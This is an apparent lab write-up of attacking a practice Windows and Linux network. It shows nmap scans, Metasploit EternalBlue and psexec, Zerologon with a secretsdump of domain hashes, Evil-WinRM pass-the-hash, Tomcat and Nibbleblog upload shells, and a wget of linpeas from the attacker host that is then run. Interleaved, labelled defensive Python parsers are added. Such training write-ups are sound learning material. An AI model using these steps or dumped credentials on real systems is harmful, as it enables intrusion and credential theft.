# Final LAB Network infrastructure attack
# NMAP: scanning the network
Find out which hosts are on the network.
* nmap 192.168.100.0/24 -T4
```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 14:53 MSK
Nmap scan report for 192.168.100.1
Host is up (0.014s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for 192.168.100.7
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 192.168.100.9
Host is up (0.011s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Nmap scan report for 192.168.100.11
Host is up (0.014s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
Nmap scan report for 192.168.100.12
Host is up (0.0099s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap scan report for 192.168.100.16
Host is up (0.011s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
Nmap scan report for 192.168.100.18
Host is up (0.011s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
31337/tcp open Elite
Nmap scan report for 192.168.100.20
Host is up (0.012s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.24
Host is up (0.0098s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
# HOSTS
## 192.168.100.7 (Win7 SP1) - ms17-010
```
Nmap scan report for 192.168.100.7
Host is up (0.015s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server?
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OFFICE-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
```
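As an added example (not from the original write-up), a small parser for Nmap's normal output that turns the sweep and the `--script vuln` results above into a per-host exposure list: open ports plus every NSE script that reported `State: VULNERABLE`, ranked so that hosts with confirmed findings such as smb-vuln-ms17-010 come first. The `RISKY` port set is my assumption about what should not be reachable from a whole segment, and the sample is a trimmed copy of the scan output on this page.

```python
"""Parse Nmap normal output into a per-host exposure inventory (added example)."""
import re
from collections import defaultdict

# Constructed sample: trimmed copy of the scan output shown in this write-up.
SAMPLE = """\
Nmap scan report for 192.168.100.7
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds
3389/tcp open ms-wbt-server?
| rdp-vuln-ms12-020:
| State: VULNERABLE
Host script results:
| smb-vuln-ms17-010:
| State: VULNERABLE
|_smb-vuln-ms10-054: false
Nmap scan report for 192.168.100.12
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|\s*([a-z0-9-]+):\s*$")  # e.g. "| smb-vuln-ms17-010:"
STATE_RE = re.compile(r"^\|\s*State:\s*(.+)")

def parse_nmap(text):
    """Return {host: {"ports": [(port, service)], "vulns": [nse_script]}}."""
    hosts = defaultdict(lambda: {"ports": [], "vulns": []})
    host = script = None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
        elif host is None:
            continue
        elif m := PORT_RE.match(line):
            hosts[host]["ports"].append((int(m.group(1)), m.group(3)))
            script = None
        elif m := SCRIPT_RE.match(line):
            script = m.group(1)  # an NSE block starts; remember which script
        elif (m := STATE_RE.match(line)) and script and "VULNERABLE" in m.group(1):
            if script not in hosts[host]["vulns"]:
                hosts[host]["vulns"].append(script)
    return dict(hosts)

# Assumption: services that should not be reachable from a whole segment.
RISKY = {445: "SMB", 3389: "RDP", 3306: "MySQL"}

def exposure_report(text):
    """Rank hosts: confirmed NSE findings first, then number of risky open ports."""
    rows = [(h, i["vulns"], [RISKY[p] for p, _ in i["ports"] if p in RISKY])
            for h, i in parse_nmap(text).items()]
    return sorted(rows, key=lambda r: (-len(r[1]), -len(r[2]), r[0]))
```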
Use exploit windows/smb/ms17_010_eternalblue

Go to Users - Administrator - Desktop
and do not find the flag file.

Then I tried reconnecting to the machine about 10 times and searching for the flag file, but in the end I apparently broke the connection, since the machine became invulnerable)
## 192.168.100.9 - ms17_010 (psexec)
Vulnerability scan
* nmap 192.168.100.9 --script vuln
```
Nmap scan report for 192.168.100.9
Host is up (0.60s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
|_ /icons/: Potentially interesting folder w/ directory listing
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.100.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.100.9:80/
| Form id: username
| Form action: index.php
|
| Path: http://192.168.100.9:80/index.php
| Form id: username
| Form action: index.php
|
| Path: http://192.168.100.9:80/register.php
| Form id: username
| Form action: register.php
|
| Path: http://192.168.100.9:80/forgot.php
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.100.9
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.100.9:443/
| Form id: username
| Form action: index.php
|
| Path: https://192.168.100.9:443/forgot.php
| Form id:
| Form action:
|
| Path: https://192.168.100.9:443/index.php
| Form id: username
| Form action: index.php
|
| Path: https://192.168.100.9:443/register.php
| Form id: username
|_ Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp open microsoft-ds
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 366.53 seconds
```
Nmap highlighted the **smb-vuln-ms17-010** vulnerability for us.
Go to Metasploit and attack the host
* msfconsole -q
* search ms17_010
* use exploit(windows/smb/ms17_010_psexec)

Go to the Administrator/Desktop folder
**Found the flag**

## 192.168.100.16 - DC tech.local
Scan the DC with **linWinPWN**


! Authentications method: null session
This is zerologon!
### ZEROLOGON
**Secretsdump** - dump the domain credentials from NTDS.DIT
```
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py DC01\$@192.168.100.16 -just-dc -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a73a2b453dd867f6a95dc81a6a907033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48e0bad80cafc6fd7bd74d30689eb496:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tech.local\engineer:1104:aad3b435b51404eeaad3b435b51404ee:f67e6562390dea47df701c6ee299ca6f:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ENGINEER$:1105:aad3b435b51404eeaad3b435b51404ee:728e84d1372639f874df339765d5d66d:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:8e199819a4223a913fcbfdf8eba62cb516d279453bbc5ab563d1beb90fa6b940
krbtgt:aes128-cts-hmac-sha1-96:98b58976dffca6b3d4f61d475ef0f07a
krbtgt:des-cbc-md5:64755b86aec7ece9
tech.local\engineer:aes256-cts-hmac-sha1-96:36253ff90c65b10a33603710d55786d5ce5f6fd742779a2a099315b7babcf888
tech.local\engineer:aes128-cts-hmac-sha1-96:26eed2110ec5d3b04764bd3a548d047c
tech.local\engineer:des-cbc-md5:765b0494574567b3
DC01$:aes256-cts-hmac-sha1-96:364a3e7060014999643ef3ea105a6c50ca48849951d7840e2846dff3bdce7f98
DC01$:aes128-cts-hmac-sha1-96:b29233c7d3deaef093bb33dd64729d51
DC01$:des-cbc-md5:daea2907abfd3d3d
ENGINEER$:aes256-cts-hmac-sha1-96:b6efcef02ca7a74fa379bc78e1bc593f305f30d60fe6fa2bd0ad23dded68af98
ENGINEER$:aes128-cts-hmac-sha1-96:ea2ed64ccadd0dd6f7b5d59160a9f7f9
ENGINEER$:des-cbc-md5:0ed61cdf680d2975
[*] Cleaning up...
```
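As an added example (not from the write-up and not Impacket code), a check a defender or IR team can run over a secretsdump-style NTDS listing like the one above: Zerologon works by resetting the DC's own machine-account password to empty, so DC01$ ending up with the empty-password NT hash is the artefact to look for, while Guest and DefaultAccount carrying the same hash is normal for disabled built-ins. The same parser also surfaces password reuse and leftover LM hashes; the svc_example account in the sample is invented to show the reuse case.

```python
"""Spot Zerologon-style artefacts in a secretsdump listing (added example)."""

# Well-known values: NT hash of the empty password and the "no LM hash" marker.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample: lines from the dump above plus one invented reuse case.
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a73a2b453dd867f6a95dc81a6a907033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tech.local\\engineer:1104:aad3b435b51404eeaad3b435b51404ee:f67e6562390dea47df701c6ee299ca6f:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ENGINEER$:1105:aad3b435b51404eeaad3b435b51404ee:728e84d1372639f874df339765d5d66d:::
svc_example:1200:aad3b435b51404eeaad3b435b51404ee:a73a2b453dd867f6a95dc81a6a907033:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:8e199819a4223a913fcbfdf8eba62cb516d279453bbc5ab563d1beb90fa6b940
"""

def parse_secretsdump(text):
    """Return (account, rid, lmhash, nthash) tuples from the NTDS hash section.

    Only name:rid:lm:nt::: rows count; [*] status and Kerberos-key lines are skipped.
    """
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if not line.endswith(":::") or len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows

def zerologon_artefacts(text):
    """Machine accounts (name ends in $) holding the empty-password NT hash.

    Zerologon (CVE-2020-1472) resets the DC machine-account password to empty,
    so DC01$ with EMPTY_NT is the post-exploitation fingerprint. Disabled
    built-ins (Guest, DefaultAccount) also carry EMPTY_NT and are normal, which
    is why only $-accounts are reported.
    """
    return [a for a, _, _, nt in parse_secretsdump(text)
            if a.endswith("$") and nt == EMPTY_NT]

def shared_password_hashes(text):
    """Groups of accounts sharing a non-empty NT hash (password reuse)."""
    by_hash = {}
    for account, _, _, nt in parse_secretsdump(text):
        if nt != EMPTY_NT:
            by_hash.setdefault(nt, []).append(account)
    return {nt: accts for nt, accts in by_hash.items() if len(accts) > 1}

def lm_hashes_present(text):
    """Accounts still storing an LM hash (LM hash storage should be disabled)."""
    return [a for a, _, lm, _ in parse_secretsdump(text) if lm != EMPTY_LM]
```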
We can also use **metasploit** to dump the credentials

Connect to the machine via **Evil-WinRM** using the administrator's login and hash
* evil-winrm -i 192.168.100.16 -u Administrator -H a73a2b453dd867f6a95dc81a6a907033
### Getting the domain admin flag

* `*Evil-WinRM* PS C:\> whoami /groups`
```
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TECH\Group Policy Creator Owners Group S-1-5-21-2863272-3253994480-1350133221-520 Mandatory group, Enabled by default, Enabled group
TECH\Domain Admins Group S-1-5-21-2863272-3253994480-1350133221-512 Mandatory group, Enabled by default, Enabled group
TECH\Enterprise Admins Group S-1-5-21-2863272-3253994480-1350133221-519 Mandatory group, Enabled by default, Enabled group
TECH\Schema Admins Group S-1-5-21-2863272-3253994480-1350133221-518 Mandatory group, Enabled by default, Enabled group
TECH\Denied RODC Password Replication Group Alias S-1-5-21-2863272-3253994480-1350133221-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
```
## 192.168.100.12 - tomcat
Computer name: portal
Opened port 8080 in the browser.
Entered a non-existent login and password, and it showed the default login and password, which we use to log in.

Use the exploit tomcat_mgr_upload


Go to /home/user
Found the user flag

The tomcat post module also gave us more users and passwords

* Escalating privileges
```
The /etc/passwd file contains information about user accounts. It is world-readable, but normally writable only by root. Historically, /etc/passwd held the users' password hashes, and some versions of Linux still allow password hashes to be stored there. If we have write access to this file as a low-privileged user, we can abuse that privilege to effectively overwrite the root user's password hash.
```
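As an added example (not from the write-up), an audit that checks a host for exactly the /etc/passwd weakness just described: the file's permissions and owner, any entry that stores a hash directly in the password field instead of the `x` shadow marker, and any second UID 0 account. The sample is constructed; the `backup` line is the planted bad entry.

```python
"""Audit /etc/passwd for the abuse described above (added example)."""
import os
import stat

# Constructed sample: a normal system plus two planted problems on the last line.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
backup:$1$abc$Xyz123:0:0:backup:/root:/bin/bash
"""
SHADOWED = ("x", "*", "!", "!!")  # field 2 values meaning "hash is in /etc/shadow or locked"

def parse_passwd(text):
    """Return one dict per line; malformed lines get an 'error' key instead."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit():
            entries.append({"line": n, "error": "malformed", "raw": line})
            continue
        entries.append({"line": n, "name": f[0], "pw": f[1], "uid": int(f[2]),
                        "home": f[5], "shell": f[6]})
    return entries

def audit_passwd_content(text):
    """Findings an attacker with write access to /etc/passwd would leave behind."""
    findings = []
    for e in parse_passwd(text):
        if "error" in e:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        who = f"line {e['line']}: {e['name']}"
        if e["pw"] == "":
            findings.append(f"{who} has an empty password field")
        elif e["pw"] not in SHADOWED:          # a real hash is stored in passwd
            findings.append(f"{who} stores a password hash in /etc/passwd")
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{who} is a second UID 0 account")
    return findings

def mode_is_unsafe(mode, uid):
    """True if group/other can write or the owner is not root (expect 0644, root)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) or uid != 0

def audit_passwd_file(path="/etc/passwd"):
    """Combine the permission check with the content check on a live file."""
    st = os.stat(path)
    findings = ["file is writable by non-root or not owned by root"] \
        if mode_is_unsafe(st.st_mode, st.st_uid) else []
    with open(path, encoding="utf-8") as fh:
        findings += audit_passwd_content(fh.read())
    return findings
```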
Unfortunately, in my case the write permission on /etc/passwd had disappeared.
Next I tried uploading linpeas to the machine:
* python -c 'import pty; pty.spawn("/bin/bash")'
* wget 10.8.0.2:80/linpeas.sh
* chmod +x linpeas.sh
* ./linpeas.sh
Studied the report. Tried various CVEs, but without success.
Some gave errors during compilation. Some did not work. Spent 2 days on this box. I assume the privilege-escalation solution is to use SUID. But without help from colleagues I cannot manage it yet.
## 192.168.100.24 - nibbleblog
Enumerate the directories
* gobuster dir -u 192.168.100.24 -k -t 50 -b 404,403 -x txt,html,bak,old -o gb_hr.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
└─# cat gb_hr.txt
/content (Status: 301) [Size: 318] [--> http://192.168.100.24/content/]
/themes (Status: 301) [Size: 317] [--> http://192.168.100.24/themes/]
/admin (Status: 301) [Size: 316] [--> http://192.168.100.24/admin/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.100.24/plugins/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 320] [--> http://192.168.100.24/languages/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.100.24/javascript/]
/LICENSE (Status: 200) [Size: 35148]
/LICENSE.txt (Status: 200) [Size: 35148]
/COPYRIGHT.txt (Status: 200) [Size: 1272]
/COPYRIGHT (Status: 200) [Size: 1272]
```
Following the links returns Access Denied.
Nmap vulnerability scan
* nmap 192.168.100.24 --script vuln -Pn -sS
```
└─# nmap 192.168.100.24 --script vuln -Pn -sS
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 17:56 MSK
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.100.24
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /admin.php:
| PHPSESSID:
|_ httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin.php: Possible admin folder
|_ /README: Interesting, a readme.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
```
Nmap highlighted that there is something interesting at 192.168.100.24/admin.php.
Try logging in with the default credentials:
admin:admin
Logged into the admin panel

Next step - get a reverse shell
Find the exploit in Metasploit
* exploit(multi/http/nibbleblog_file_upload)
Got a session

Got the user flag

Escalate privileges
* sudo su

Got the root flag

# Summary - My opinion
I feel a bit like a script kiddie.
But given my "background", even the fact that I was able to get into the systems using scripts, and mostly Metasploit, I consider progress for me))
I really liked the lab; I realised there is still a lot I need to learn and understand.